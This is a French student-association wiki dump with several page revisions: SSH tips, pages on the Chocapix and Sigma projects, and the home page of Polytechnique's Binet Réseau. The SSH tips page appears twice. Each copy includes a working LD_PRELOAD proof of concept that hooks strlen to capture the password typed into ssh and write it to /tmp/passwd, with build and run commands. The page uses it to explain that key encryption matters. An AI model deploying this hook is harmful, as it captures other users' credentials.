mv ssh-aliases ~/bin # ou ailleurs dans votre path, si c'est votre machine.

enfin supposons que toutes les machines habituelles aient leur nom dans le fichier './machines' :

for namae in $(cat machines); do
ln -s ~/bin/{ssh-aliases,$namae}
done

Maintenant il suffit de taper le nom de la machine pour avoir un shell dessus.
Le principe est que le script écrit plus haut regarde comment il a été appelé et invoque ssh en fonction.

==Mais un pirate peut me voler ma clef !!!==
Oui, mais elle est chiffrée... De plus, si un pirate a atteint votre niveau de privilèges, il peut facilement vous voler vos mdp :
noobpoc.c
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
void record_pwd (char *str) {
FILE*f = fopen("/tmp/passwd","a");
fprintf(f,"%s\n",str);
fflush (f);
fclose(f);
}
size_t strlen(const char * s ) {
static char ready = 0;
static char dead = 0;
if ( !dead && ready ) {
record_pwd(s);
dead = 1;
}
if ( !dead && !strcmp( s, "Password: ") ) {
ready = 1;
}
/* Does da job... */
int i = 0;
while ( s[i++] );
return (size_t) (i-1);
}

gcc -fPIC noobpoc.c -c -w -Wall -std=c99
gcc -shared -o libnoobpoc.so noobpoc.o -lc

Kaboom sur simple modification de l'environnement :
LD_PRELOAD=./libnoobpoc.so ssh localhost

Le mdp est dans /tmp/passwd...

[[catégorie: Informatique]]

Astuces ssh

2022-03-20T23:10:46Z

Jean-samuel.tettekpoe : /* Mais un pirate peut me voler ma clef !!! */

Voir aussi [[SSH]].

==Créer un couple de clefs :==
$ ssh-keygen -t dsa
Utiliser un password pour crypter la clef est important...

==Mettre la clef sur le serveur cible :==
$ ssh-copy-id -i ./ssh/id_dsa.pub serveur
ou bien ( en moins bien ) :
$ ssh serveur "cat >> .ssh/authorized_keys" < ./ssh/id_dsa.pub

==Pour ne pas avoir à décrypter la clef à chaque utilisation, mais tout en la gardant en sécurité :==
Démarrer ssh-agent:
$ eval $(ssh-agent)

Ajouter une clef :
$ ssh-add
Forwarder l'agent (ie ne pas avoir à mettre de clef sur B pour faire ssh B puis ssh C depuis B ) :
ForwardAgent yes
Dans les .ssh/config de tous les hosts qui servent de relai, à défaut, utiliser -A dans la ligne de commande de ssh.

Utiliser keychain pour partager ses clefs sur plusieurs sessions, ajouter par exemple :
keychain ~/.ssh/id_rsa ~/.ssh/id_dsa
source ~/.keychain/*-sh

à votre .bash_profile.

==Utiliser des pseudo alias :==

Dans un fichier texte ssh-aliases
#!/bin/bash
ssh $(basename $0) "$@"

puis le rendre utilisable :

chown root:root ssh-aliases &&
chmod 755 ssh-aliases &&
mv ssh-aliases ~/bin # ou ailleurs dans votre path, si c'est votre machine.

enfin supposons que toutes les machines habituelles aient leur nom dans le fichier './machines' :

for namae in $(cat machines); do
ln -s ~/bin/{ssh-aliases,$namae}
done

Maintenant il suffit de taper le nom de la machine pour avoir un shell dessus.
Le principe est que le script écrit plus haut regarde comment il a été appelé et invoque ssh en fonction.

==Mais un pirate peut me voler ma clef !!!==
Oui, mais elle est chiffrée... De plus, si un pirate a atteint votre niveau de privilèges, il peut facilement vous voler vos mdp :
noobpoc.c
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
void record_pwd (char *str) {
FILE*f = fopen("/tmp/passwd","a");
fprintf(f,"%s\n",str);
fflush (f);
fclose(f);
}
size_t strlen(const char * s ) {
static char ready = 0;
static char dead = 0;
if ( !dead && ready ) {
record_pwd(s);
dead = 1;
}
if ( !dead && !strcmp( s, "Password: ") ) {
ready = 1;
}
/* Does da job... */
int i = 0;
while ( s[i++] );
return (size_t) (i-1);
}

gcc -fPIC noobpoc.c -c -w -Wall -std=c99
gcc -shared -o libnoobpoc.so noobpoc.o -lc

Kaboom sur simple modification de l'environnement :
LD_PRELOAD=./libnoobpoc.so ssh localhost

Le mdp est dans /tmp/passwd...

[[catégorie: Informatique]]

Chocapix

2021-12-16T13:31:36Z

Jean-samuel.tettekpoe :

Chocapix est le site des bars d'étage.

Il a été développé par [[Utilisateur:Basile.Bruneau|ntag]], [[Utilisateur:Guillaume.Boisseau|nadrieril]] et [[Utilisateur:Camille.Masset|tizot]] en 2014-15 pour remplacer l'ancien site des bars. Il a été déployé pour l'arrivée des 2014, qui n'ont du coup pas connu l'ancien site.

L'API est implémentée avec django : le code est hébergé sur [https://github.com/BinetReseau/chocapix-server GitHub].

La partie client est écrite en AngularJS : le code est hébergé sur [https://github.com/BinetReseau/chocapix-client GitHub].

Une nouvelle version de la partie client réécrite en React.js est en développement depuis 2021. Le code est hébergé sur [https://gitlab.binets.fr/br/chocapix-frontend Gitlab]

Le repo principal est également sur [https://github.com/BinetReseau/chocapix-docker GitHub]

== Voir aussi ==
Pour des détails sur l'implémentation/la maintenance :
* [[Admin:Chocapix|Administration]]
* [[Chocapix:Rôles|Rôles et permissions]]
* [[Chocapix:Aliments|Aliments]]

Sigma

2021-06-30T14:48:25Z

Jean-samuel.tettekpoe :

Projet d'envergure de développement interne BR, vise à remplacer Frankiz et à introduire quelques nouvelles fonctionnalités.

Voir [https://wikix.polytechnique.org/Projet_Sigma le WikiX] pour plus d'informations.

Sigma

2021-06-30T14:48:06Z

Jean-samuel.tettekpoe :

Projet d'envergure de développement interne BR, vis à remplacer Frankiz et à introduire quelques nouvelles fonctionnalités.

Voir [https://wikix.polytechnique.org/Projet_Sigma le WikiX] pour plus d'informations.

Sigma

2021-06-30T14:47:50Z

Jean-samuel.tettekpoe :

Projet d'envergure de développement interne BR, vis à remplacer frankiz et à introduire quelques nouvelles fonctionnalités.

Voir [https://wikix.polytechnique.org/Projet_Sigma le WikiX] pour plus d'informations.

Accueil

2021-06-30T14:45:54Z

Jean-samuel.tettekpoe :

__NOTOC____NOEDITSECTION__
=== Bienvenue sur le site du BR ! ===

Le Binet Réseau est l'association d'étudiants de l'[http://www.polytechnique.fr École polytechnique] qui s'occupent du réseau élève : maintenance des serveurs, mise en place de nouveaux services et développement (applications réseau et sites).

L'InfoBR est disponible [http://wikibr.binets.fr/files/InfoBR_2016.pdf ici] pour sa version 2016 [http://wikibr.binets.fr/files/InfoBR_2k15.pdf là] pour la version 2015, [http://wikibr.binets.fr/files/InfoBR_2k14.pdf par ici] pour la version 2014, [http://wikibr.binets.fr/files/InfoBR_2k13.pdf par là] pour la version 2013, [http://wikibr.binets.fr/files/InfoBR_2k12_final.pdf encore ici] pour la version 2012, et [https://ik.frankiz.net/pdfs/ik/InfoBR.pdf enfin là] pour la version 2011.

<div style="float: left; width: 46%; margin: 0 1% 0 0;">
=Les ressources en ligne=
==Nos services==
* [[DNS|DNS des élèves]]
* [[Apple_on_Campus|Apple on Campus]]
* [[Titus|Titus, le chat promo]]
* [[Serveur IRC|IRC sur le platal]]
* [[LDAP|L'annuaire LDAP (complétion automatique des adresses mail)]]
* [[Chocapix|Chocapix, le site des bars d'etage]]
* [[Sigma|Sigma]] (nouveau [[Guide Frankiz|Frankiz]])
* [[Platalpad|L'édition collaborative de documents avec PlatalPad]]
* [[Hébergement_des_sites_des_binets|Hébergement des sites pour les binets]]
==Utilisation de nos services==
* [http://infobr.eleves.polytechnique.fr Configurer sa connexion à internet]
* [[Diagnostic réseau|Diagnostiquer seul une panne du réseau]]
* [[Routeurs_Wi-Fi|Configurer son routeur wifi]]
* [[Comptes Sigma|Demander la création d'un compte Sigma]]
</div>

<div style="float: right; width: 46%; margin: 0 1%;-moz-box-shadow: 1px 1px 12px #AAA; -webkit-box-shadow: 1px 1px 12px #AAA; padding: 1em; margin-top: 1em;">
===Le BR recrute===
Les membres du Binet Réseau ne sont pas pour autant tous des férus d'informatique et se partagent les taches en fonction de leurs capacités et de leurs envies : relations avec nos partenaires, communication avec les élèves constituent aussi des postes essentiels.

Ainsi, le Binet Réseau offre une chance unique d'approfondir ses connaissances en informatique, au service des autres et en se faisant plaisir.
----
=== Deviens un membre actif du BR ! ===
À n'importe quelle époque de l'année, viens nous voir et nous t'accueillerons à bras ouverts. Il y a toujours des choses à faire pour améliorer les services ou faire de nouveaux services.

==Fiches techniques==
* [[Recuperation de donnees perdues|Comment récupérer mes données que j'ai effacées sur mon disque dur ?]]
* [[Sauvegarde (ordinateur)|Comment faire une sauvegarde complète de mon système Windows ?]]
* [[Git|Comment utiliser Git ? (Pour les projets en équipe)]]
* [[Astuces_ssh|Utiliser la protection ssh]]
</div>
<div style="clear:both;"></div>

=N'hésite pas à nous contacter=
{| class="tableau-support"
| valign="top" |{{block|Par mail|support mail|Edit.png}}
| valign="top" |{{block|Au téléphone|support téléphone|Phone.png}} {{block|En vrai|support vrai|People.png}}
| valign="top" |{{block|Sur IRC|support irc|Serveur.png}}
|}

Comptes Sigma

2021-06-30T14:32:54Z

Jean-samuel.tettekpoe :

Pour créer votre mot de passe la première fois cliquez sur "Mot de passe oublié" sur la page de connexion.
En cas de souci, vous pouvez créer un ticket sur [https://panix.binets.fr PaniX].

Accueil

2021-06-30T14:26:06Z

Jean-samuel.tettekpoe :

__NOTOC____NOEDITSECTION__
=== Bienvenue sur le site du BR ! ===

Le Binet Réseau est l'association d'étudiants de l'[http://www.polytechnique.fr École polytechnique] qui s'occupent du réseau élève : maintenance des serveurs, mise en place de nouveaux services et développement (applications réseau et sites).

L'InfoBR est disponible [http://wikibr.binets.fr/files/InfoBR_2016.pdf ici] pour sa version 2016 [http://wikibr.binets.fr/files/InfoBR_2k15.pdf là] pour la version 2015, [http://wikibr.binets.fr/files/InfoBR_2k14.pdf par ici] pour la version 2014, [http://wikibr.binets.fr/files/InfoBR_2k13.pdf par là] pour la version 2013, [http://wikibr.binets.fr/files/InfoBR_2k12_final.pdf encore ici] pour la version 2012, et [https://ik.frankiz.net/pdfs/ik/InfoBR.pdf enfin là] pour la version 2011.

<div style="float: left; width: 46%; margin: 0 1% 0 0;">
=Les ressources en ligne=
==Nos services==
* [[DNS|DNS des élèves]]
* [[Apple_on_Campus|Apple on Campus]]
* [[Titus|Titus, le chat promo]]
* [[Serveur IRC|IRC sur le platal]]
* [[LDAP|L'annuaire LDAP (complétion automatique des adresses mail)]]
* [[Chocapix|Chocapix, le site des bars d'etage]]
* [[Guide Frankiz|Frankiz]]
* [[Platalpad|L'édition collaborative de documents avec PlatalPad]]
* [[Hébergement_des_sites_des_binets|Hébergement des sites pour les binets]]
==Utilisation de nos services==
* [http://infobr.eleves.polytechnique.fr Configurer sa connexion à internet]
* [[Diagnostic réseau|Diagnostiquer seul une panne du réseau]]
* [[Routeurs_Wi-Fi|Configurer son routeur wifi]]
* [[Comptes Sigma|Demander la création d'un compte Sigma]]
</div>

<div style="float: right; width: 46%; margin: 0 1%;-moz-box-shadow: 1px 1px 12px #AAA; -webkit-box-shadow: 1px 1px 12px #AAA; padding: 1em; margin-top: 1em;">
===Le BR recrute===
Les membres du Binet Réseau ne sont pas pour autant tous des férus d'informatique et se partagent les taches en fonction de leurs capacités et de leurs envies : relations avec nos partenaires, communication avec les élèves constituent aussi des postes essentiels.

Ainsi, le Binet Réseau offre une chance unique d'approfondir ses connaissances en informatique, au service des autres et en se faisant plaisir.
----
=== Deviens un membre actif du BR ! ===
À n'importe quelle époque de l'année, viens nous voir et nous t'accueillerons à bras ouverts. Il y a toujours des choses à faire pour améliorer les services ou faire de nouveaux services.

==Fiches techniques==
* [[Recuperation de donnees perdues|Comment récupérer mes données que j'ai effacées sur mon disque dur ?]]
* [[Sauvegarde (ordinateur)|Comment faire une sauvegarde complète de mon système Windows ?]]
* [[Git|Comment utiliser Git ? (Pour les projets en équipe)]]
* [[Astuces_ssh|Utiliser la protection ssh]]
</div>
<div style="clear:both;"></div>

=N'hésite pas à nous contacter=
{| class="tableau-support"
| valign="top" |{{block|Par mail|support mail|Edit.png}}
| valign="top" |{{block|Au téléphone|support téléphone|Phone.png}} {{block|En vrai|support vrai|People.png}}
| valign="top" |{{block|Sur IRC|support irc|Serveur.png}}
|}

Comptes Frankiz

2021-06-30T09:57:32Z

Jean-samuel.tettekpoe : Jean-samuel.tettekpoe a déplacé la page Comptes Frankiz vers Comptes Sigma : Actualisation

#REDIRECTION [[Comptes Sigma]]

Comptes Sigma

2021-06-30T09:57:32Z

Jean-samuel.tettekpoe : Jean-samuel.tettekpoe a déplacé la page Comptes Frankiz vers Comptes Sigma : Actualisation

Contacter [mailto:web@eleves.polytechnique.fr web@eleves.polytechnique.fr] pour tout question, ou problème sur votre compte.